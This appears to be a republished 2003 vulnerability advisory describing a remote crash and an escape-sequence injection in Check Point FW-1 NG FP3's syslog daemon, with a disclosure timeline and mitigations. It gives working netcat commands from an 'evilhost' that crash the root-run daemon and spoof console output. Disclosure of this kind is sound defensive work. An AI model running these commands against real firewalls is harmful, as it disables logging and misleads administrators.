|
|
|
|
| |
| Two vulnerabilities have been found in Check Point FW-1's Syslog daemon. One allows successful DoS from remote against syslog daemon of Check Point FW-1 NG FP3 (also FP3 HF1). The other allows syslog message containing escape sequences directed to syslog daemon of Check Point FW-1 NG FP3 (including HF1 and HF2) remain unfiltered and cause strange output behavior if the log is viewed on console. |
| |
Credit:
The information has been provided by Dr. Peter Bieringer.
|
| |
Check Point VPN-1/FW-1 NG FP3 contains a syslog daemon (default: off) to redirect incoming syslog messages from remote (e.g. routers) to Check Point's SmartTracker logging mechanism. This syslog daemon can be crashed from remote and it will not start again automatically. Neither the watchdog service detects the crash nor does an entry in the SmartView Tracker appear regarding the unavailability of syslog daemon.
Additionally it will print all chars received in a syslog message from remote without any modifications. This means, escape sequences are not filtered or e.g. expanded to their octal values in ASCII.
1. Vulnerability: Successful DoS from remote against syslog daemon of Check Point FW-1 NG FP3 (also FP3 HF1), perhaps remote root exploit possible.
Tested version and platform:
Check Point FW-1 NG FP3 (with or without HF1) on Red Hat Linux 7.3 running kernel 2.4.9-34
md5sum of binary
[firewall]# md5sum /opt/CPfw1-50-03/bin/syslog
4eba3458cb05ed30dec6a75a17b0925a /opt/CPfw1-50-03/bin/syslog
Contained in:
[firewall]# rpm -qf /opt/CPfw1-50-03/bin/syslog
CPfw1-50-03
With build time:
[firewall]# rpm -q --queryformat "%{buildtime}\n" CPfw1
1032421147 (Thu 19 Sep 2002 09:39:07 AM MEST)
Note: FP3-HF1 does not update this binary.
Instruction how to crash the syslog daemon of Check Point FW-1 NG FP3:
Start syslog daemon by enabling in the firewall object (and run cpstop/cpstart afterwards) or by hand executing:
[firewall]# /opt/CPfw1-50-03/bin/syslog 514 all
Shutting down kernel logger: [ OK ]
Shutting down system logger: [ OK ]
Starting system logger: [ OK ]
Starting kernel logger: [ OK ]
Segmentation fault <- caused after receiving random syslog payload, see below
Check for listening syslog daemon:
[firewall]# netstat -lnptu |grep -w 514
udp 0 0 0.0.0.0:514 0.0.0.0:* $pid/syslog
Note also that this daemon is running as "root":
# ps -ux | grep -w syslog
root $pid 0.0 6.8 148064 8612 ? S 12:17 0:00 syslog 514 all
Send a valid syslog message from a remote host (here also a Linux system):
[evilhost]# echo "<189>19: 00:01:04: Test" | nc -u firewall 514
Send random payload via syslog message from a remote host:
[evilhost]# cat /dev/urandom | nc -u firewall 514
The previous started syslog daemon should crash after short time, use "netstat" to see whether a daemon is still listening on UDP port 514
Note: For a clean restart of Check Point's syslog daemon the firewall service needs to be restarted.
Solutions to prevent the successful DoS attack against syslog service:
- Upgrade to FP3 HF2 as soon as possible, see http://www.checkpoint.com/techsupport/ng/fp3_hotfix.html for more information (available since 14 March 2003).
- Customize your ruleset and accept syslog messages only from dedicated (and trusted, see below) senders by the enforcement module
2. Vulnerability: Syslog messages containing escape sequences directed to syslog daemon of Check Point FW-1 NG FP3 (including HF1 and Hf2) remain unfiltered and can cause strange output behavior if log is viewed on console.
Tested version and platform:
Check Point FW-1 NG FP3 (also with HF1 or HF2) on Red Hat Linux 7.3 running kernel 2.4.9-34
Syslog message from network is not checked against non-printable characters, therefore if log is viewed on console, you can no longer trust the visual output at all.
Instructions for demonstration:
Enable receiving of syslog from remote by FW-1 like e.g. described above.
View log on console by running following command:
[firewall]# fw log -nfnl
Send some special escape sequences via syslog, e.g.
[evilhost]# echo -e "<189>19: 00:01:04: Test\a\033[2J\033[2;5m\033[1;31mHACKER~ ATTACK\033[2;25m\033[22;30m\033[3q" | nc -u firewall 514
Take a look at the console again, but don't be scared too much for now... Press CTRL-C and reset the console to standard by executing:
[firewall]# reset
Attackers might send many "special" escape sequences, for Linux as destination see "man console_codes" for more.
Note: Standard syslog daemon on a RHL 7.3 system treats code like this as shown here:
Mar 14 13:29:30 linuxbox 19: 00:01:04: Test^G^[[2J^[[2;5m^[[1;31mHACKER ATTACK ^[[2;25m^[[22;30m^[[3q
Solutions to prevent unfiltered console output:
- Filter log output by using "tr" like:
[firewall]# fw log -tfnl | tr '\000-\011\013-\037\200-\377' '*'
(all chars with ASCII codes from decimal 0-31 and 128-255 except 10 for LF are replaced by a '*')
- Update Check Point's syslog daemon to newer version once again, when available.
- Improve rule set like suggested above.
History:
2003-01-17: Syslog crash issue detected by Dr. Peter Bieringer of AERAsec while testing the new introduced syslog daemon feature in FP3
2003-01-17: Create first internal summary
2003-01-17: Information about the crash sent to vendor by e-mail
2003-01-20: Extend summary to a full advisory
2003-01-23: Unofficial confirmation that information was received by vendor
2003-01-24: Official answer which confirms this issue
2003-01-28: Cosmetic review of advisory
2003-02-28: Detect problem with unfiltered console codes, notify vendor by e-mail (no response about that problem until now)
2003-03-14: Add information about unfiltered console codes, review for publishing
2003-03-17: Pre-final review
2003-03-20: Check Point posted an alert
2003-03-21: Final review and official announcement
2003-03-21: Add note about distribution of this advisory
2003-03-22: Fix some typos
Note: The 2 month delay between notifying vendor and public release of this advisory was caused by an accepted request of the vendor for a delay to avoid breaking its already running QA cycle for HF2.
Official word from Check Point:
Additional information about the vulnerability can be viewed by going to: http://www.checkpoint.com/techsupport/alerts/syslog.html or http://www.checkpoint.com/techsupport/ng/fp3_hotfix.html
|
|
|
|
|
